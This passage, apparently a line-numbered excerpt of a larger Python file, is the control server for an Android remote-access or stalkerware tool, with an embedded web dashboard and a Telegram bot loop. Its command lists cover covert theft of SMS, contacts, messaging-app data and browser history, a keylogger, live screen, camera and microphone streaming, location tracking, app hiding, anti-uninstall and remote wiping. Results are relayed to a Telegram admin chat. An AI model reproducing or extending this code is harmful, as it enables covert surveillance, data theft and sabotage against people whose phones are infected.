  3000→
  3001→function doLogout(){
  3002→try{api('web/logout',{method:'POST'});}catch(e){}
  3003→TOKEN='';localStorage.removeItem('az_token');
  3004→document.getElementById('app').style.display='none';
  3005→document.getElementById('loginPage').style.display='flex';
  3006→if(POLL_INTERVAL)clearInterval(POLL_INTERVAL);
  3007→}
  3008→
  3009→function showApp(){
  3010→document.getElementById('loginPage').style.display='none';
  3011→document.getElementById('app').style.display='block';
  3012→loadAll();
  3013→POLL_INTERVAL=setInterval(loadAll,5000);
  3014→}
  3015→
  3016→function toggleSidebar(){document.getElementById('sidebar').classList.toggle('open');}
  3017→
  3018→function showPage(name,event){
  3019→document.querySelectorAll('.page').forEach(p=>p.classList.remove('active'));
  3020→document.getElementById('page-'+name).classList.add('active');
  3021→document.querySelectorAll('.sidebar a').forEach(a=>a.classList.remove('active'));
  3022→if(event&&event.target)event.target.classList.add('active');
  3023→document.getElementById('sidebar').classList.remove('open');
  3024→}
  3025→
  3026→function updateClock(){
  3027→const now=new Date();
  3028→document.getElementById('clock').textContent=now.toLocaleString('ar-SA');
  3029→}
  3030→setInterval(updateClock,1000);updateClock();
  3031→
  3032→function populateDeviceSelects(){
  3033→const html=DEVICES.map(d=>`<option value="${d.id}">${d.name||d.id} (${d.active?'🟢':'🔴'})</option>`).join('');
  3034→['cmdDevice','fileDevice','dataDevice','monDevice','streamDevice'].forEach(id=>{
  3035→const el=document.getElementById(id);if(el)el.innerHTML=html;
  3036→});
  3037→}
  3038→
  3039→async function loadAll(){
  3040→try{const r=await api('web/stats');if(r.ok)renderStats(r.stats);}catch(e){}
  3041→try{const r=await api('web/devices');if(r.ok){DEVICES=r.devices||[];populateDeviceSelects();renderDevices();}}catch(e){}
  3042→try{const r=await api('web/commands');if(r.ok)renderCommandLog(r.commands);}catch(e){}
  3043→loadEvents();
  3044→loadSettings();
  3045→}
  3046→
  3047→function renderStats(s){
  3048→const grid=document.getElementById('statsGrid');
  3049→grid.innerHTML=`
  3050→<div class="stat-card"><div class="label">⏱ Uptime</div><div class="value">${s.uptime_formatted||'-'}</div></div>
  3051→<div class="stat-card"><div class="label">📱 Devices</div><div class="value" style="color:var(--blue)">${s.devices_total}</div><div class="sub">🟢 ${s.devices_online} online</div></div>
  3052→<div class="stat-card"><div class="label">📋 Commands</div><div class="value" style="color:var(--yellow)">${s.total_registered_commands}</div><div class="sub">⏳ ${s.commands_pending} pending</div></div>
  3053→<div class="stat-card"><div class="label">📨 Messages</div><div class="value" style="color:var(--purple)">${s.messages_sent}</div></div>
  3054→<div class="stat-card"><div class="label">📡 API</div><div class="value">${s.api_hits}</div><div class="sub">hits</div></div>
  3055→<div class="stat-card"><div class="label">✅ Completed</div><div class="value" style="color:var(--green)">${s.commands_completed}</div></div>`;
  3056→}
  3057→
  3058→function renderDevices(){
  3059→const el=document.getElementById('deviceList');
  3060→const dash=document.getElementById('dashDevices');
  3061→if(!DEVICES.length){
  3062→el.innerHTML='<div class="empty">No devices linked</div>';
  3063→dash.innerHTML='<div class="empty">No devices</div>';
  3064→return;
  3065→}
  3066→const card=d=>`
  3067→<div class="device-card" onclick="showDeviceDetail('${d.id}')">
  3068→<div class="name">${d.active?'🟢':'🔴'} ${d.name||d.id}</div>
  3069→<div class="meta">Model: ${d.model||'-'} | OS: ${d.os||'-'}</div>
  3070→<div class="meta">Battery: ${d.battery||'-'}% | Last: ${d.last_seen||'-'}</div>
  3071→</div>`;
  3072→el.innerHTML=DEVICES.map(card).join('');
  3073→dash.innerHTML=DEVICES.slice(0,4).map(card).join('');
  3074→}
  3075→
  3076→async function showDeviceDetail(id){
  3077→try{
  3078→const r=await api('web/device/'+id);
  3079→if(!r.ok)return;
  3080→const d=r.device;const cmds=r.commands||[];
  3081→const detail=document.getElementById('deviceDetail');
  3082→detail.style.display='block';
  3083→detail.innerHTML=`
  3084→<h2>📱 ${d.name||d.id}</h2>
  3085→<div style="display:grid;grid-template-columns:1fr 1fr;gap:12px;margin:16px 0">
  3086→<div><span style="color:var(--text2)">ID:</span> <code>${d.id}</code></div>
  3087→<div><span style="color:var(--text2)">Status:</span> ${d.active?'<span class="badge badge-green">Online</span>':'<span class="badge badge-red">Offline</span>'}</div>
  3088→<div><span style="color:var(--text2)">Model:</span> ${d.model||'-'}</div>
  3089→<div><span style="color:var(--text2)">OS:</span> ${d.os||'-'}</div>
  3090→<div><span style="color:var(--text2)">Battery:</span> ${d.battery||'-'}%</div>
  3091→<div><span style="color:var(--text2)">Network:</span> ${d.network||'-'}</div>
  3092→<div><span style="color:var(--text2)">Location:</span> ${d.location||'-'}</div>
  3093→<div><span style="color:var(--text2)">Last Seen:</span> ${d.last_seen||'-'}</div>
  3094→</div>
  3095→<h3>📋 Recent Commands</h3>
  3096→${cmds.length?cmds.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">${c.created_at} | ID: ${c.id}</div></div>`).join(''):'<div class="empty">No commands</div>'}
  3097→<button class="btn btn-danger btn-sm" onclick="unlinkDevice('${d.id}')" style="margin-top:16px">🗑️ Unlink Device</button>`;
  3098→detail.scrollIntoView({behavior:'smooth'});
  3099→}catch(e){}
  3100→}
  3101→
  3102→async function unlinkDevice(id){
  3103→if(!confirm('Unlink this device?'))return;
  3104→const r=await api('web/unlink/'+id,{method:'DELETE'});
  3105→if(r.ok){notify('Device unlinked');loadAll();}
  3106→else notify('Failed','var(--accent)');
  3107→}
  3108→
  3109→async function generateLink(){
  3110→const r=await api('web/link_code');
  3111→if(r.ok){
  3112→const box=document.getElementById('linkCodeBox');
  3113→document.getElementById('linkCodeText').textContent=r.code;
  3114→box.style.display='block';
  3115→notify('Link code generated!');
  3116→}
  3117→}
  3118→
  3119→const CMD_CATEGORIES={
  3120→data:{label:'📊 Data',cmds:['sms','calls','contacts','location','notifications','apps','info','battery','gallery','clipboard','all_data','wifi_info','bluetooth_devices','network_info','sim_info','storage_info','installed_apps','running_apps','calendar','browser_history']},
  3121→social:{label:'🌐 Social',cmds:['whatsapp','telegram_app','instagram','messenger','snapchat','tiktok','twitter','viber','signal','facebook','whatsapp_status','whatsapp_stories','telegram_channels','instagram_stories','youtube']},
  3122→control:{label:'🎮 Control',cmds:['ping','vibrate','ring','screenshot','front_camera','back_camera','record_audio','record_video','lock_phone','unlock_phone','reboot','shutdown','set_volume','set_brightness','enable_wifi','disable_wifi','enable_bluetooth','disable_bluetooth','enable_mobile_data','disable_mobile_data','enable_hotspot','disable_hotspot','airplane_on','airplane_off','torch_on','torch_off','play_sound','speak_text','open_url','send_sms','make_call','block_number','unblock_number']},
  3123→apps:{label:'📦 Apps',cmds:['open_app','close_app','install_app','uninstall_app','block_app','unblock_app','clear_app_data','force_stop_app','app_info','app_usage','screen_time','app_permissions','enable_app','disable_app','list_blocked','clear_cache','update_app','launch_app','kill_app','app_cache']},
  3124→files:{label:'📂 Files',cmds:['list_files','get_file','download_file','list_downloads','list_dcim','list_music','list_videos','list_documents','list_whatsapp','list_telegram_files','send_contacts_backup','send_sms_backup','send_calls_backup','send_full_backup','delete_file','rename_file','copy_file','move_file','create_folder','search_files','recent_files','file_info','zip_files']},
  3125→security:{label:'🔒 Security',cmds:['wipe_data','factory_reset','show_app','hide_app','change_passcode','set_pin','remove_pin','enable_biometric','disable_biometric','anti_uninstall_on','anti_uninstall_off','device_admin_status','check_root','set_screen_lock','remove_screen_lock']},
  3126→monitor:{label:'🔍 Monitor',cmds:['keylogger_start','keylogger_stop','get_keylogger','screen_record_start','screen_record_stop','clipboard_monitor_start','clipboard_monitor_stop','get_clipboard_log','wifi_monitor_start','wifi_monitor_stop','app_monitor_start','app_monitor_stop','get_app_log','location_live','location_stop','location_history','geo_add','geo_remove','geo_list','sms_monitor','call_monitor']},
  3127→syssettings:{label:'⚙️ System',cmds:['set_language','set_timezone','set_alarm','set_timer','set_reminder','enable_dev_mode','disable_dev_mode','enable_usb_debug','disable_usb_debug','dns_change','proxy_set','apn_settings','nfc_on','nfc_off','auto_update_on','auto_update_off']}
  3128→};
  3129→
  3130→function initCmdTabs(){
  3131→const tabs=document.getElementById('cmdTabs');
  3132→tabs.innerHTML=Object.keys(CMD_CATEGORIES).map(k=>`<button class="tab${k==='data'?' active':''}" onclick="showCmdCat('${k}',this)">${CMD_CATEGORIES[k].label}</button>`).join('');
  3133→showCmdCat('data');
  3134→}
  3135→
  3136→function showCmdCat(cat,btn){
  3137→if(btn){document.querySelectorAll('#cmdTabs .tab').forEach(t=>t.classList.remove('active'));btn.classList.add('active');}
  3138→const grid=document.getElementById('cmdGrid');
  3139→grid.innerHTML=CMD_CATEGORIES[cat].cmds.map(c=>`<button class="cmd-btn" onclick="sendDeviceCmd('${c}')">${c.replace(/_/g,' ')}</button>`).join('');
  3140→}
  3141→
  3142→async function sendDeviceCmd(cmd){
  3143→const devId=document.getElementById('cmdDevice').value;
  3144→if(!devId){notify('Select a device','var(--accent)');return;}
  3145→const r=await api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})});
  3146→if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
  3147→loadAll();
  3148→}
  3149→
  3150→function sendCmd(cmd){
  3151→const devId=document.getElementById('fileDevice').value;
  3152→if(!devId){notify('Select a device','var(--accent)');return;}
  3153→api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
  3154→if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
  3155→});
  3156→}
  3157→function sendDataCmd(cmd){
  3158→const devId=document.getElementById('dataDevice').value;
  3159→if(!devId){notify('Select a device','var(--accent)');return;}
  3160→api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:'get_'+cmd})}).then(r=>{
  3161→if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
  3162→});
  3163→}
  3164→function sendMonCmd(cmd){
  3165→const devId=document.getElementById('monDevice').value;
  3166→if(!devId){notify('Select a device','var(--accent)');return;}
  3167→api('web/send_command',{method:'POST',body:JSON.stringify({device_id:devId,command:cmd})}).then(r=>{
  3168→if(r.ok)notify('Command sent!');else notify('Failed','var(--accent)');
  3169→});
  3170→}
  3171→
  3172→function renderCommandLog(cmds){
  3173→const el=document.getElementById('cmdLog');
  3174→const dash=document.getElementById('dashCommands');
  3175→const items=(cmds||[]).slice(-20).reverse();
  3176→if(!items.length){el.innerHTML='<div class="empty">No commands</div>';dash.innerHTML='';return;}
  3177→const html=items.map(c=>`<div class="cmd-item"><div class="cmd-header"><span>${c.command}</span><span class="badge badge-${c.status==='completed'?'green':c.status==='pending'?'yellow':'blue'}">${c.status}</span></div><div style="color:var(--text2);font-size:12px">Device: ${c.device_id} | ${c.created_at}</div></div>`).join('');
  3178→el.innerHTML=html;
  3179→dash.innerHTML=html;
  3180→}
  3181→
  3182→async function loadEvents(){
  3183→const r=await api('web/events');
  3184→if(r.ok){
  3185→const el=document.getElementById('eventLog');
  3186→el.innerHTML=(r.events||[]).slice(-50).reverse().map(e=>`<div class="log-item"><span class="time">${(e.time||'').slice(0,19)}</span><span class="event">${e.event} ${e.details?JSON.stringify(e.details).slice(0,60):''}</span></div>`).join('')||'<div class="empty">No events</div>';
  3187→}
  3188→}
  3189→
  3190→async function loadSettings(){
  3191→const r=await api('web/settings');
  3192→if(r.ok){
  3193→const s=r.settings;
  3194→document.getElementById('settingsForm').innerHTML=`
  3195→<label style="display:block;margin-bottom:12px">🔑 Admin Password<input id="setPass" value="${s.admin_password||'admin'}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
  3196→<label style="display:block;margin-bottom:12px">⏱️ Sync Interval (sec)<input id="setSync" type="number" value="${s.sync_interval||300}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
  3197→<label style="display:block;margin-bottom:12px">📍 Location Interval (sec)<input id="setLoc" type="number" value="${s.location_interval||60}" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"></label>
  3198→<label style="display:block;margin-bottom:12px">🌐 Language<select id="setLang" style="display:block;width:100%;padding:8px;border-radius:6px;border:1px solid var(--border);background:var(--bg);color:var(--text);margin-top:4px"><option value="ar" ${s.language==='ar'?'selected':''}>Arabic</option><option value="en" ${s.language==='en'?'selected':''}>English</option></select></label>
  3199→<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setNotif" ${s.notifications?'checked':''}> 🔔 Notifications</label>
  3200→<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoLoc" ${s.auto_location?'checked':''}> 🗺️ Auto Location</label>
  3201→<label style="display:flex;align-items:center;gap:8px;margin-bottom:12px"><input type="checkbox" id="setAutoSync" ${s.auto_sync?'checked':''}> 🔄 Auto Sync</label>`;
  3202→}
  3203→}
  3204→
  3205→async function saveSettings(){
  3206→const data={
  3207→admin_password:document.getElementById('setPass').value,
  3208→sync_interval:parseInt(document.getElementById('setSync').value),
  3209→location_interval:parseInt(document.getElementById('setLoc').value),
  3210→language:document.getElementById('setLang').value,
  3211→notifications:document.getElementById('setNotif').checked,
  3212→auto_location:document.getElementById('setAutoLoc').checked,
  3213→auto_sync:document.getElementById('setAutoSync').checked,
  3214→};
  3215→const r=await api('web/settings',{method:'PUT',body:JSON.stringify(data)});
  3216→if(r.ok)notify('Settings saved!');else notify('Failed','var(--accent)');
  3217→}
  3218→
  3219→if(TOKEN){showApp();}
  3220→initCmdTabs();
  3221→setTimeout(loadSettings,500);
  3222→
  3223→// ========== LIVE STREAMING (JPEG Screenshot-based) ==========
  3224→let _streamType='screen';
  3225→let _streamActive=false;
  3226→let _streamPollTimer=null;
  3227→let _frameCount=0;
  3228→let _audioAnimFrame=null;
  3229→let _streamWaitingTimer=null;
  3230→let _firstFrameReceived=false;
  3231→let _lastFrameData='';
  3232→let _streamQuality=3;
  3233→
  3234→
  3235→
  3236→function onStreamDeviceChange(){
  3237→const devId=document.getElementById('streamDevice').value;
  3238→document.getElementById('stDevice').textContent=devId?((DEVICES.find(function(d){return d.id===devId;})||{}).name||devId):'-';
  3239→if(_streamActive)stopStream();
  3240→}
  3241→
  3242→function selectStreamType(type){
  3243→_streamType=type;
  3244→document.querySelectorAll('.stream-type-btn').forEach(function(b){b.classList.remove('active');});
  3245→var btnId=type==='screen'?'stScreen':type==='camera'?'stCamera':'stAudio';
  3246→document.getElementById(btnId).classList.add('active');
  3247→document.getElementById('qualityCard').style.display=type==='audio'?'none':'block';
  3248→}
  3249→
  3250→function setQuality(q,btn){
  3251→_streamQuality={'low':8,'medium':3,'high':1}[q]||3;
  3252→document.querySelectorAll('.stream-quality button').forEach(function(b){b.classList.remove('active');});
  3253→btn.classList.add('active');
  3254→notify('تم تغيير الجودة');
  3255→}
  3256→
  3257→function _setViewerState(state){
  3258→var viewer=document.getElementById('streamViewer');
  3259→var noMsg=document.getElementById('noStreamMsg');
  3260→var img=document.getElementById('streamImg');
  3261→var badge=document.getElementById('streamBadge');
  3262→var audioC=document.getElementById('audioPlayerContainer');
  3263→noMsg.style.display='none';img.style.display='none';badge.style.display='none';audioC.style.display='none';viewer.style.background='#000';
  3264→if(state==='idle'){noMsg.style.display='';noMsg.innerHTML='<div style="font-size:48px;margin-bottom:12px">&#x1F4E1;</div>اختر جهازاً وابدأ البث المباشر';viewer.style.background='var(--surface)';}
  3265→else if(state==='waiting'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div class="pulse" style="font-size:48px;margin-bottom:16px">&#x231B;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px">جاري انتظار الصورة من الجهاز...</div><div style="color:var(--text2);font-size:13px">يتم إرسال أمر لقطة الشاشة للجهاز.<br>قد يستغرق الأمر بضع ثوانٍ للإطار الأول.<br>تأكد أن الجهاز متصل بالإنترنت وأن إذن التقاط الشاشة ممنوحة.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--yellow)">● انتظار...</span>';}
  3266→else if(state==='connected'){document.getElementById('stStatus').innerHTML='<span style="color:var(--blue)">● متصل - ينتظر إطار...</span>';}
  3267→else if(state==='receiving_video'){img.style.display='';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">● مباشر</span>';}
  3268→else if(state==='receiving_audio'){audioC.style.display='block';badge.style.display='';badge.className='stream-badge live';noMsg.style.display='none';document.getElementById('stStatus').innerHTML='<span style="color:var(--green)">● مباشر</span>';}
  3269→else if(state==='error'){noMsg.style.display='';noMsg.innerHTML='<div style="text-align:center"><div style="font-size:48px;margin-bottom:16px">&#x26A0;&#xFE0F;</div><div style="font-size:16px;font-weight:600;margin-bottom:8px;color:var(--accent)">لم يتم استلام البث</div><div style="color:var(--text2);font-size:13px">تأكد أن الجهاز متصل ويمكنه تنفيذ أمر لقطة الشاشة.<br>تأكد من منح إذن التقاط الشاشة في تطبيق الجهاز.<br>حاول مرة أخرى.</div></div>';document.getElementById('stStatus').innerHTML='<span style="color:var(--accent)">● فشل</span>';}
  3270→}
  3271→
  3272→async function startStream(){
  3273→var devId=document.getElementById('streamDevice').value;
  3274→if(!devId){notify('اختر جهازاً أولاً','var(--accent)');return;}
  3275→_streamActive=true;_frameCount=0;_firstFrameReceived=false;_lastFrameData='';
  3276→document.getElementById('btnStartStream').style.display='none';
  3277→document.getElementById('btnStopStream').style.display='';
  3278→document.getElementById('btnSwitchCam').style.display=_streamType==='camera'?'':'none';
  3279→document.getElementById('stFrames').textContent='0';
  3280→document.getElementById('stLastAct').textContent='-';
  3281→var typeLabel=_streamType==='screen'?'الشاشة':_streamType==='camera'?'الكاميرا':'الصوت';
  3282→document.getElementById('stType').textContent=typeLabel;
  3283→var dev=DEVICES.find(function(d){return d.id===devId;});
  3284→document.getElementById('stDevice').textContent=(dev&&dev.name)||devId;
  3285→_setViewerState('waiting');
  3286→notify('جاري بدء البث: '+typeLabel);
  3287→var interval=_streamType==='audio'?5:_streamQuality;
  3288→var r=await api('stream/jpeg_start',{method:'POST',body:JSON.stringify({device_id:devId,type:_streamType,interval:interval})});
  3289→if(!r.ok){notify('فشل بدء البث: '+(r.error||''),'var(--accent)');_setViewerState('error');_streamActive=false;document.getElementById('btnStartStream').style.display='';document.getElementById('btnStopStream').style.display='none';return;}
  3290→notify('تم بدء البث - بانتظار الإطار الأول...');
  3291→startStreamPolling(devId);
  3292→if(_streamWaitingTimer)clearTimeout(_streamWaitingTimer);
  3293→_streamWaitingTimer=setTimeout(function(){if(_streamActive&&!_firstFrameReceived){_setViewerState('error');}},60000);
  3294→}
  3295→
  3296→async function stopStream(){
  3297→var devId=document.getElementById('streamDevice').value;
  3298→if(!devId)return;
  3299→api('stream/jpeg_stop',{method:'POST',body:JSON.stringify({device_id:devId})});
  3300→_cleanupStream();
  3301→notify('تم إيقاف البث');
  3302→}
  3303→
  3304→function _cleanupStream(){
  3305→_streamActive=false;_firstFrameReceived=false;_lastFrameData='';
  3306→if(_streamPollTimer){clearInterval(_streamPollTimer);_streamPollTimer=null;}
  3307→if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}
  3308→if(_audioAnimFrame){cancelAnimationFrame(_audioAnimFrame);_audioAnimFrame=null;}
  3309→document.getElementById('btnStartStream').style.display='';
  3310→document.getElementById('btnStopStream').style.display='none';
  3311→document.getElementById('btnSwitchCam').style.display='none';
  3312→_setViewerState('idle');
  3313→document.getElementById('stStatus').textContent='متوقف';
  3314→}
  3315→
  3316→async function switchCamera(){
  3317→var devId=document.getElementById('streamDevice').value;
  3318→if(!devId)return;
  3319→if(_streamType==='front_camera') _streamType='back_camera';
  3320→else if(_streamType==='back_camera') _streamType='front_camera';
  3321→else _streamType='camera';
  3322→if(_streamActive){stopStream();setTimeout(function(){startStream();},500);}
  3323→else{startStream();}
  3324→notify('تم تبديل الكاميرا');
  3325→}
  3326→
  3327→function _onFrameReceived(base64Data,isAudio){
  3328→if(base64Data===_lastFrameData)return;
  3329→_lastFrameData=base64Data;
  3330→if(!_firstFrameReceived){_firstFrameReceived=true;if(_streamWaitingTimer){clearTimeout(_streamWaitingTimer);_streamWaitingTimer=null;}}
  3331→_frameCount++;
  3332→document.getElementById('stFrames').textContent=_frameCount;
  3333→document.getElementById('stLastAct').textContent=new Date().toLocaleTimeString();
  3334→if(isAudio){_setViewerState('receiving_audio');}
  3335→else{_setViewerState('receiving_video');document.getElementById('streamImg').src='data:image/jpeg;base64,'+base64Data;}
  3336→}
  3337→
  3338→function startStreamPolling(devId){
  3339→if(_streamPollTimer)clearInterval(_streamPollTimer);
  3340→_streamPollTimer=setInterval(async function(){
  3341→if(!_streamActive)return;
  3342→try{
  3343→var typeParam=_streamType==='audio'?'audio':'video';
  3344→var resp=await fetch('/api/stream/frame/'+devId+'?type='+typeParam,{headers:{'Authorization':'Bearer '+TOKEN}});
  3345→var r=await resp.json();
  3346→if(r.ok&&r.data&&r.data.length>50){_onFrameReceived(r.data,false);}
  3347→else if(r.ok&&_firstFrameReceived){}
  3348→else if(!_firstFrameReceived){
  3349→try{var sr=await fetch('/api/stream/status',{headers:{'Authorization':'Bearer '+TOKEN}});var status=await sr.json();if(status.ok&&status.active_streams&&status.active_streams[devId]){if(!_firstFrameReceived)_setViewerState('connected');}else if(!_firstFrameReceived&&_streamActive){_setViewerState('waiting');}}catch(e){}
  3350→}
  3351→}catch(e){}
  3352→},2000);
  3353→}
  3354→
  3355→// Add streaming category to commands
  3356→if(typeof CMD_CATEGORIES!=='undefined'){
  3357→CMD_CATEGORIES.streaming={label:'📡 Streaming',cmds:['start_screen_stream','stop_screen_stream','start_camera_stream','stop_camera_stream','switch_camera','start_audio_stream','stop_audio_stream','get_stream_status','set_stream_quality','enable_torch','pause_stream','resume_stream','stop_all_streams','get_stream_capabilities']};
  3358→if(document.getElementById('cmdTabs')){
  3359→var tabs=document.getElementById('cmdTabs');
  3360→if(tabs.innerHTML.indexOf('Streaming')===-1){
  3361→tabs.innerHTML+='<button class="tab" onclick="showCmdCat(\'streaming\',this)">📡 Streaming</button>';
  3362→}
  3363→}
  3364→}
  3365→</script>
  3366→</body>
  3367→</html>"""
  3368→
  3369→# ============================================================================
  3370→# WEB DASHBOARD ROUTE
  3371→# ============================================================================
  3372→
  3373→async def serve_dashboard(request):
  3374→    return web.Response(text=DASHBOARD_HTML, content_type="text/html", charset="utf-8")
  3375→
  3376→# ============================================================================
  3377→# GETUPDATES POLLING
  3378→# ============================================================================
  3379→
  3380→async def tg_poll_loop():
  3381→    global tg_offset, polling_active, _processed_update_ids, _processed_message_keys, _message_dedup, _chat_rate_counter, _data_forward_dedup
  3382→    polling_active = True
  3383→    
  3384→    # === تنظيف الاتصالات القديمة عند بدء التشغيل ===
  3385→    log.info("Cleaning old connections (deleteWebhook)...")
  3386→    try:
  3387→        session = get_tg_session()
  3388→        # حذف webhook وتجاهل التحديثات المعلقة
  3389→        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/deleteWebhook?drop_pending_updates=true") as resp:
  3390→            r = await resp.json()
  3391→            log.info("deleteWebhook: %s", r.get("description", r.get("ok")))
  3392→        await asyncio.sleep(1)
  3393→        # التحقق من البوت
  3394→        async with session.post(f"https://api.telegram.org/bot{BOT_TOKEN}/getMe") as resp:
  3395→            me = await resp.json()
  3396→            if me.get("ok"):
  3397→                log.info("Bot connected: @%s (%s)", me["result"].get("username", "?"), me["result"].get("first_name", "?"))
  3398→            else:
  3399→                log.warning("getMe failed: %s", me)
  3400→        await asyncio.sleep(1)
  3401→    except Exception as exc:
  3402→        log.warning("Connection cleanup: %s", exc)
  3403→    
  3404→    log.info("Starting Telegram getUpdates polling...")
  3405→    
  3406→    _conflict_count = 0
  3407→    while polling_active:
  3408→        try:
  3409→            payload = {
  3410→                "offset": tg_offset,
  3411→                "timeout": 30,
  3412→                "allowed_updates": ["message", "callback_query"],
  3413→            }
  3414→            result = await tg_request("getUpdates", payload)
  3415→            if not result or not result.get("ok"):
  3416→                desc = (result or {}).get("description", "")
  3417→                if "Conflict" in desc:
  3418→                    _conflict_count += 1
  3419→                    log.warning("Conflict detected (%d), waiting...", _conflict_count)
  3420→                    await asyncio.sleep(8)
  3421→                else:
  3422→                    await asyncio.sleep(2)
  3423→                continue
  3424→            _conflict_count = 0  # إعادة العداد عند النجاح
  3425→            
  3426→            # Periodic cleanup (every 100 polls)
  3427→            if not hasattr(tg_poll_loop, '_poll_count'):
  3428→                tg_poll_loop._poll_count = 0
  3429→            tg_poll_loop._poll_count += 1
  3430→            if tg_poll_loop._poll_count % 100 == 0:
  3431→                now = time.time()
  3432→                _message_dedup = {k: v for k, v in _message_dedup.items() if now - v > 600}
  3433→                _chat_rate_counter = {k: v for k, v in _chat_rate_counter.items() if v and now - v[-1] > 300}
  3434→                _data_forward_dedup = {k: v for k, v in _data_forward_dedup.items() if now - v > 300}
  3435→            
  3436→            updates = result.get("result", [])
  3437→            for update in updates:
  3438→                update_id = update.get("update_id", 0)
  3439→                tg_offset = update_id + 1
  3440→                
  3441→                # === منع تكرار معالجة نفس التحديث ===
  3442→                if update_id in _processed_update_ids:
  3443→                    continue
  3444→                _processed_update_ids.add(update_id)
  3445→                if len(_processed_update_ids) > 1000:
  3446→                    _processed_update_ids = set(list(_processed_update_ids)[-500:])
  3447→                
  3448→                # Handle message
  3449→                if "message" in update:
  3450→                    msg = update["message"]
  3451→                    chat_id = msg.get("chat", {}).get("id")
  3452→                    text = msg.get("text", "")
  3453→                    msg_id = msg.get("message_id", 0)
  3454→                    
  3455→                    # === منع تكرار معالجة نفس الرسالة بالضبط ===
  3456→                    msg_key = f"{chat_id}:{msg_id}"
  3457→                    if msg_key in _processed_message_keys:
  3458→                        continue
  3459→                    _processed_message_keys.add(msg_key)
  3460→                    if len(_processed_message_keys) > 500:
  3461→                        _processed_message_keys = set(list(_processed_message_keys)[-200:])
  3462→                    
  3463→                    if chat_id != ADMIN_CHAT_ID:
  3464→                        log.warning("Unauthorized access from %s", chat_id)
  3465→                        continue
  3466→                    
  3467→                    if text.startswith("/"):
  3468→                        await handle_telegram_command(chat_id, text, msg_id)
  3469→                
  3470→                # Handle callback query
  3471→                if "callback_query" in update:
  3472→                    cb = update["callback_query"]
  3473→                    cb_id = cb.get("id", "")
  3474→                    cb_chat = cb.get("message", {}).get("chat", {}).get("id")
  3475→                    
  3476→                    # === منع تكرار معالجة نفس الـ callback ===
  3477→                    cb_key = f"cb:{cb_id}"
  3478→                    if cb_key in _processed_message_keys:
  3479→                        continue
  3480→                    _processed_message_keys.add(cb_key)
  3481→                    
  3482→                    if cb_chat != ADMIN_CHAT_ID:
  3483→                        continue
  3484→                    await handle_callback_query(cb)
  3485→        
  3486→        except asyncio.CancelledError:
  3487→            break
  3488→        except Exception as exc:
  3489→            log.error("Poll error: %s", exc)
  3490→            await asyncio.sleep(3)
  3491→
  3492→# ============================================================================
  3493→# FIREBASE COMMAND RESULT LISTENER
  3494→# ============================================================================
  3495→
  3496→async def firebase_result_listener():
  3497→    """Background task: Poll Firebase for results from Android app.
  3498→    ACTIVE mode - forwards results to Telegram admin."""
  3499→    global _processed_results

[showing lines 3000-3499 of 4299; use offset=3500 with limit to continue reading]